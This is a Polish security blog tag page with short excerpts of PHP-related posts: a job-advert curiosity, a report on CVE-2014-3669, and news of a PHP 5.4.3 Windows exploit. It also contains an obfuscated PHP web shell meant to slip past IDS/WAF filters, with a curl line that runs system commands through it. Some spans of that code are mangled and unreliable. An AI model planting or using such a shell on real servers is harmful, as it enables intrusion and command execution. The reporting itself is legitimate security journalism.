Wpisy z tagiem "PHP"
Dominik donosi, że serwis trojmiasto.pl wyświetla ciekawy komunikat na górze strony. Cała witryna wygląda tak:
A jej najciekawszy fragment w powiększeniu tak:
Ktoś rozpoznaje ramkę z błędem?
PS. Jeśli to prawdziwe ogłoszenie, to gratulujemy pomysłu.
Aktualizacja: Faktycznie trwa rekrutacja.… Czytaj dalej
W ostatnim czasie deweloperzy usunęli sporo poważnych błędów w PHP. Najpoważniejszy z odkrytych przez badaczy z High-Tech Bridge błędów to CVE-2014-3669, który może prowadzić do zdalnego wykonania kodu i dotyczy systemów 32-bitowych.
Błąd dotyczy deserializacji przekazywanych danych. Przy odpowiednich wartościach w systemach 32 bitowych udaje się przepełnić integera (long ma przedział od 2147483647 do -2147483648), a co za tym idzie, wskazać na niewłaściwe adres pamięci.… Czytaj dalej
Również bez cudzysłowów, funkcji, stałych… Ciekawe, ile systemów typu IDS/WAF może ominąć. Wygląda tak:
@$_[][email protected]!+_; [email protected]${_}>>$_;$_[]=$__;$_[][email protected]_;$_[((++$__)+($__++ ))].=$_;
$_[]=++$__; $_[]=$_[--$__][$__>>$__];$_[$__].=(($__+$__)+ $_[$__-$__]).($__+$__+$__)+$_[$__-$__];
$_[$__+$__] =($_[$__][$__>>$__]).($_[$__][$__]^$_[$__][($__<<$__)-$__] );
$_[$__+$__] .=($_[$__][($__<<$__)-($__/$__)])^($_[$__][$__] );
$_[$__+$__] .=($_[$__][$__+$__])^$_[$__][($__<<$__)-$__ ];
$_=$
$_[$__+ $__] ;$_[@-_]($_[@!+_] );
a używa się jej tak:
$ curl 'http://127.0.0.1:9999/shell.php?0=system&1=uname%20-a'
…
Czytaj dalej
Od przynajmniej tygodnia krąży w sieci exploit na PHP 5.4.3 na Windows, wykorzystujący lukę w funkcji com_print_typeinfo. Co ciekawe, autorem kodu exploita jest Polak, Maksymilian Motyl, znany pod pseudonimem 0in.
Do tej pory nie została wydana poprawka, zatem możliwości obrony przed potencjalnym atakiem są niestety dość ograniczone.… Czytaj dalej